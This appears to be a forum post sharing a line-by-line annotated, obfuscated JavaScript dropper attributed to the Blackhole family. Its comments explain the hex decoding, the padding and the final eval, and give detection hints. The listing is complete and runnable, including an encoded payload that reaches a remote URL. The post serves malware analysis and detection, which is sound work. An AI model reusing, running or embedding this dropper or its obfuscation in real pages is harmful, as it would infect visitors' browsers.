Interesting malicious script #1

 // Obfuscated JavaScript dropper. The whole listing exists to rebuild one string
 // (HEKIZIOW) from the hex blob hSUhic and hand it to eval on the last line.
 // Every empty function and every `if('aaaa'=='bbbb')` branch is dead code (the
 // two literals never match, so the call/assignment never runs); they are padding
 // to defeat signature matching. Only the variables named in the comments below
 // take part in the real control flow.
 1  var CJlKp; function AyzhzK(){}
 // Hex-escaped property names so the strings do not appear literally:
 //   UjFXc  -> "slice"
 //   AFXFJ  -> "parseInt"
 //   CBjFe  -> "fromCharCode"
 // HEKIZIOW is the accumulator for the decoded payload.
 2  var KCfW; var xBtS; var HEKIZIOW=""; if('EXHJH'=='vaEYij')LWkpgS(); if('CLfChe'=='QiJCNa')uYVR='YcOyK'; var UjFXc="sl\x69\x63e"; var kBzvW='FUQEEH'; if('hyIN'=='Sjacj')YNTWV='MgnooX'; var AFXFJ="par\x73\x65I\x6e\x74"; function isOLx(){ var MffyRe='uVxx'; if('VOchH'=='wFdlb')jmQg();} var OOfB=266; var CBjFe="from\x43\x68arCo\x64\x65"; var WctUeU=70; function mETfy(){ var frqWsm='VUkpH'; if('ISUjCf'=='ooMnor')uXsN();} var ickml='EdHEGs'; function iBnNdM(){ var fdjY='oNsVaE'; if('zvawkT'=='hKLy')RCnxsx();} function KdEQdo(){ var htQo='aahGP'; if('NiRNL'=='igtAy')SvWSak();}
 // bQArecF -> "eval". hSUhic is the encoded payload: a sequence of two-digit hex
 // pairs, each one character of the real script shifted by +49 (see the loop below).
 3  var bQArecF="\x65va\x6c"; var CoCv; var hSUhic="97a69f94a59aa09f517896a5a9595aaca792a3518599969f516e519f96a8517592a596595a6c8599969f5fa496a5859a9e96598599969f5f9896a5859a9e96595a515c5163655b67615b67615b6261616161615a6ca792a35194a0a09c9a9684a5a39a9f98516e519f96a85184a5a39a9f985995a094a69e969fa55f94a0a09c9a965a6ca792a35194a0a09c9a967996929596a3516e51536294626a926a93686464636995979365976297649361926362676696936697656e536ca792a3519396989a9f81a0a49aa59aa09f516e5194a0a09c9a9684a5a39a9f985f9a9f9596a980975994a0a09c9a967996929596a35a6c9a9751599396989a9f81a0a49aa59aa09f51526e515e625aac51ae51969da49651ac5195a094a69e969fa55f94a0a09c9a96516e51536294626a926a93686464636995979365976297649361926362676696936697656e95649e9895a76267966a6aa6999d949a61a6636a9367626798686c96a9a19aa396a46e535c518599969f5fa5a0787e8584a5a39a9f98595a6c95a094a69e969fa55fa8a39aa59659586d9a97a3929e9651a89a95a5996e5362535199969a9899a56e5362535193a0a39596a36e5361535197a3929e9693a0a39596a36e53615351a4a3946e5399a5a5a16b606094a09fa5a39294a3a65f94a09e609ba46098a05fa199a170a49a956e62536f6d609a97a3929e966f585a6c51ae51ae517896a5a9595a6c"; var uXxtZR; if('yhio'=='XJNeu')iPwQ(); function JJzKgq(){ var Pprz='HfRLK'; if('fSeuLE'=='Cmzqzh')fYhHk();} function GukX(){ var lwMRz='BIVP'; if('PxWxYW'=='zPKT')TdLG();}
 // JJPANg is the global object: this script is not in strict mode, so `this` inside a
 // plain function call is the global object (window in a browser). It is used as a
 // lookup table so that globals (parseInt, eval) are reached by string name rather
 // than by identifier.
 4  var JJPANg=( function(){ function pTLNxj(){}
 5  return  this; function nqdbb(){ var izkwtx='tXwVwD'; if('aKcN'=='ACjplq')dVkVS();} function CXyDOj(){} function PBeid(){}})(); function vooP(){} function MSHc(){}
 // ROrCn -> "constructor".
 6  if('MWcZI'=='jZKAY')iLhg='RVPHa'; var ROrCn="\x63\x6fnst\x72\x75ctor"; var MySXGL; function BjraL(){ var PgUmc='dOaSu'; if('nrXie'=='cWfc')mSKg();}
 // dbNwId = "HPRIc"["constructor"], i.e. the String constructor, obtained from an
 // arbitrary literal so the identifier `String` never appears in the source.
 // dbNwId["fromCharCode"] in the loop below is therefore String.fromCharCode.
 7  var dbNwId="HPRIc"[ROrCn]; if('EqRN'=='lGvAZh')FxemqM='OwCf'; function jtCrn(){}
 8  function SgTG(){}
 // Decode loop. For every two-character slice of hSUhic:
 //   code = parseInt(pair, 16) - 49;  HEKIZIOW += String.fromCharCode(code)
 // e.g. the first pair "97" -> 0x97 - 49 = 102 -> "f"; the first eight pairs spell
 // "function", so HEKIZIOW is JavaScript source.
 // NXBWzRCL and CBRLbsdu are never declared with var, so they are created as
 // implicit globals; the function declaration inside the loop body is more dead code.
 9  for(NXBWzRCL=0;NXBWzRCL<hSUhic.length;NXBWzRCL+=2){ var DoyNqK; if('UmLXys'=='HorpX')qPFj='uyyr';CBRLbsdu=JJPANg[AFXFJ](hSUhic[UjFXc](NXBWzRCL,NXBWzRCL+2),16)-49; function hGrsA(){ var wERD='csxJmp'; if('XbtA'=='Ktvf')MptqGo();} var eenfM='NbKy';HEKIZIOW+=dbNwId[CBjFe](CBRLbsdu)
10  if('qajnID'=='IUBrP')NPzkj='nMaGZ'; if('AduB'=='vrtx')ZaiTw='NVNo';}
 // This is where the payload is executed: JJPANg[bQArecF](HEKIZIOW) is
 // <global>["eval"](decoded), an indirect eval, so the decoded script runs in global
 // scope. For analysis, replace or hook eval (and/or String.fromCharCode) in an
 // isolated sandbox to capture HEKIZIOW instead of running it. Detection hints that
 // survive renaming: hex-escaped "\x65va\x6c"/"constructor" strings, a
 // `"literal"["constructor"]` String lookup, a parseInt(...,16) minus-constant loop
 // feeding fromCharCode, and the `(function(){return this})()` global grab.
11  if('KQgidC'=='ClKb')kqjEAT();JJPANg[bQArecF](HEKIZIOW); function LLIEAa(){} if('rCcB'=='fkiBG')Jyghv(); if('IaqY'=='YDomN')hVhK(); if('eTdLwx'=='rrqc')vGUG();

 

I found this one in the wild. It is really heavily obfuscated and I can't find where they eval the malicious payload. This script finally leads to a Russian web site.

 

Forefront classifies it as Blacole.A, but it is not quite like any Blackhole exploit script I have ever seen.
